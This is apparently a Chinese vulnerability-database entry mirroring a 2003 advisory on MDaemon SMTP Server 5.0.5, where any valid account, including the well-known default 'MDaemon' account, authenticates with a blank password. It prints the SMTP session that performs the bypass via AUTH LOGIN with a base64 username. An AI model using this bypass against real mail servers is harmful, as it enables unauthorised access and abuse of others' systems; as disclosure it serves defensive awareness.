MDaemon SMTP Server 5.0.5 – Null Password Authentication

MDaemon SMTP Server 5.0.5 – Null Password Authentication

漏洞ID 1054080 漏洞类型
发布时间 2003-08-09 更新时间 2003-08-09
图片[1]-MDaemon SMTP Server 5.0.5 – Null Password Authentication-安全小百科CVE编号 N/A
图片[2]-MDaemon SMTP Server 5.0.5 – Null Password Authentication-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23002
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8382/info

A vulnerability has been reported to affect the MDaemon SMTP authentication handler.

It has been reported that any valid username or account can be used in conjunction with a null password, to access the MDaemon SMTP server. This issue may be exaggerated, because a default MDaemon account 'MDaemon' is well known.

220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6 (334 Username:)
TURhZW1vbg== (MDaemon)
334 UGFzc3dvcmQ6 (334 Password:)
(blank password)
235 Authentication successful

相关推荐: PunBB Post Count Modification Vulnerability

PunBB Post Count Modification Vulnerability 漏洞ID 1101964 漏洞类型 Input Validation Error 发布时间 2002-06-18 更新时间 2002-06-18 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享